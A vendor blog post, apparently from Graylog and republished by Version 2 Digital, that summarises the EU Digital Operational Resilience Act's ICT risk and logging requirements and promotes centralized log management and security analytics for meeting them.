The adoption of the Digital Operational Resilience Act (DORA) places additional resilience compliance requirements on the European financial sector, ones that centralized log management can help them manage.

What is the Digital Operational Resilience Act (DORA)?

Formally adopted by the European Parliament and goes into effect on January 17, 2025, the Digital Operational Resilience Act (DORA) established uniform network and information system security requirements across the financial sector and the third-parties that provide Information Communication Technology (ICT) services, including cloud platforms and data analytics services.

The DORA regulatory framework requires organizations to make sure they can withstand, respond to, and recover from ICT-related disruptions and threats. It sets out standardized requirements for  preventing and mitigating cyber threats across all European Union (EU) member states.

Who will DORA apply to?

To achieve DORA’s resilience goals, the regulation applies to a long list of entities within the financial services industry and third-parties that enable them, including:

  • Credit institutions
  • Payment institutions
  • Account information service providers
  • Electronic money institutions
  • Investment firms
  • Crypto-asset services providers
  • Central security depositories
  • Central counterparties
  • Trading venues and repositories
  • Managers of alternate investment funds
  • Management companies
  • Data reporting service providers
  • Insurance and reinsurance undertakings
  • Insurance, reinsurance, and ancillary insurance intermediaries
  • Institutions for occupational retirement provision
  • Credit rating agencies
  • Administrators of critical benchmarks
  • Crowdfunding service providers
  • Securitisation repositories
  • ICT third-party service providers

What are DORA’s key provisions?

Section II outlines DORA’s key requirements including:

  • Article 6 ICT risk management framework: strategies, policies, procedures, ICT protocols and tools necessary to protect information and ICT assets
  • Article 7 ICT systems, protocols and tools: use and maintain updated ICT systems, protocols and tools that are appropriate to operational magnitude, reliable, equipped with sufficient capacity, and technologically resilient
  • Article 8 Identification: identify, classify, document, and engage in a risk analysis for all information and ICT assets and processes, including those on remote sites, network resources, and hardware equipment
  • Article 9 Protection and prevention: develop, document, implement, and maintain security policies and technical controls that protect data confidentiality, integrity, availability, and authenticity and continuously monitor the effectiveness of controls
  • Article 10 Detection: implement mechanisms and provide sufficient resources to monitor and detect, across multiple layers of control, anomalous activity by using defined thresholds and criteria that trigger and initiate incident response processes
  • Article 11 Response and recovery: establish and implement an ICT business continuity policy based on a business impact analysis (BIA) that includes dedicated, appropriate, documented, and tested arrangements, plans, procedures, and mechanisms for ensuring critical functions, responding to and resolving incidents, enable incident containment, estimate preliminary impact, damage, and losses, and establish communications and crisis management activities
  • Article 12 Backup policies and procedures, restoration and recovery procedures and methods: develop, document, implement and test backup, restoration, and recovery policies, procedures, methods, and service level agreements that can be activated without jeopardizing network ir information system security or data availability, authenticity, integrity, or confidentiality
  • Article 13 Learning and evolving: implement capabilities and staff to gather vulnerability and cyber threat information, develop ICT-security awareness programs, and review incident detection, response, forensic analysis, escalation, and internal and external communication capabilities to improve business continuity
  • Article 14 Communication: implement crisis communications plans and policies that inform internal staff and external stakeholders about ICT-related incidents or vulnerabilities

For small and non-interconnected investment firms, payment institutions, electronic money institutions, and occupational retirement provisions, or other exempt entities, Article 16 articulates a simplified ICT risk management framework that requires:

  • Implementing and maintaining an ICT risk management framework with mechanisms and measures that mitigate risk
  • Continuously monitoring ICT system security and functioning
  • Protecting data availability, authenticity, integrity, and confidentiality using sound, resilient, and updated ICT systems, protocols, and tools
  • Promptly identifying and detecting ICT-related risks, incidents, and anomalous activities
  • Identifying key ICT third-party service provider dependencies
  • Implementing business continuity plans, response, and recovery measures, including backup and restoration
  • Testing risk mitigation measures, data protections, and business continuity plans
  • Implementing changes based on tests and post-incident analyses, including changes to ICT risk profile, ICT security awareness programs, and staff and management digital operational resilience training

The Regulatory Technical Standards

On January 17, 2024, the final draft of the Regulatory Technical Standards was published. Under Section V ICT Operations Security, Article 12 Logging defines acceptable procedures, protocols, and tools.

The logging procedures and protocols should:

  • Identify the events to log
  • Retain logs for an appropriate time
  • Enable the secure handling of log data

When using logs to detect anomalous activities, organizations are required to collect log events related to the following:

  • Identity and access, including logical and physical access control
  • Capacity management
  • Change management
  • ICT operations, including system activities
  • Network traffic, including performance

The details captured in the logs should align with their purpose and usage to enable accurate alerting and forensic analysis. Under Chapter III, Article 23 organizations shall implement detection mechanisms allowing them to:

  • Collect, monitor, and analyze internal and external factors, including logs collected according to Article 12
  • Generate alerts for identifying anomalous activities and behaviors with automated alerts based on predefined rules
  • Prioritize alerts to manage incidents within the required timeframe
  • Record, analyze, and evaluate relevant information on all abnormal activities and behaviors either automatically or manually

When establishing criteria that triggers threat detection and incident response (TDIR), organizations shall consider the following criteria:

  • Indications that malicious actors carried out malicious activity or compromised a system or network
  • Data losses detected that impact data availability, authenticity, integrity, and confidentiality
  • Adverse impact on transactions and operations detected
  • System and network unavailability

Compliance Monitoring For DORA Compliance

Centralized log management with security analytics enables you to continuously monitor your environment and create high-fidelity alerts that enable faster response, investigation, and recovery. To help you meet DORA compliance requirements, you can use your centralized log management solution to support:

  • Access monitoring
  • Network monitoring
  • Endpoint security
  • Patch management
  • Data exfiltration/data loss
  • Incident and response

Further, it enables many of DORA’s key requirements, including:

Access Monitoring

Your centralized log management solution ingests access logs from across your environment, including on-premises and cloud-based resources. When paired with user and entity behavior analytics (UEBA), it gives you a robust access monitoring solution to detect and investigate anomalous behavior, even within a complex environment.

Network Monitoring

By using a centralized log management solution with security analytics, you can engage in security functions like:

  • Privileged access management (PAM)
  • Password policy compliance
  • Abnormal privilege escalation
  • Time spent accessing a resource
  • Brute force attack detection

Network Monitoring

When monitoring network security, you’re usually correlating and analyzing data from several different tools.

Your firewalls define the inbound and outbound traffic, giving you the ability to detect suspicious activity like data traveling to a cybercriminal-controlled server.

Network Monitoring

Intrusion detection systems and intrusion prevention systems (IPS) provide visibility into potential evasion techniques. When combined with your firewall data, you have a more complete story. 

When the centralized log management solution also incorporates security analytics, you can set baselines for normal network traffic that help you detect anomalies for visibility into a potential security incident.

Data exfiltration

Between credential-based attacks, malware/ransomware attacks, and Advanced Persistent Threats (APTs), monitoring your systems for data exfiltration is critical to DORA compliance. 

If your centralized log management solution provides security analytics that you can combine with threat intelligence, your dashboards and high-fidelity alerts enable you to more rapidly detect, investigate, and respond to security incidents. 

For example, when you can aggregate your network monitoring and antivirus logs then correlate them with UEBA to detect anomalies, you can create alerts that provide insights into abnormal data downloads indicating a security incident. 

Network Monitoring

Incident response and automated threat hunting

With lightning fast search and proactive threat hunting capabilities, you can implement a robust incident response plan that enables digital resilience. 

For example, if you can create queries using parameters instead of specific values, you can optimize search for real-time answers. 

To take a proactive approach, you can create parameterized searches that look for advanced threat activities like:

  • Abnormal user access to sensitive information
  • Abnormal time of day and location of access
  • High volumes of files accessed
  • Higher than normal CPU, memory, or disk utilization
  • Higher than normal network traffic

Compliance reporting and post-incident learning

Your senior leadership team needs to know what happened and how quickly you responded, but it may not need the deep technical details. Your centralized log management solutions dashboards can provide the high level visualizations that enable everyone to evaluate the security incident after you restore and recover your systems.

For example, you could use a dashboard to show:

  • Start of incident: when logs documented changes
  • Incident activities: what types of changes the logs documented to highlight what the threat actor tried to do
  • Containment/Eradication: when logs stop reporting the activities indicating the threat actor is no longer acting in the system

Compliance reporting and post-incident learning

Graylog Security: Security analytics without complexity

With Graylog’s security analytics and anomaly detection capabilities, you get the cybersecurity platform you need without the complexity that makes your team’s job harder. With our powerful, lightning-fast features and intuitive user interface, you can lower your labor costs while reducing alert fatigue and getting the answers you need – quickly.

Our prebuilt search templates, dashboards, correlated alerts, and dynamic look-up tables enable you to get immediate value from your logs while empowering your security team.

 

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

×

Hello!

Click one of our contacts below to chat on WhatsApp

×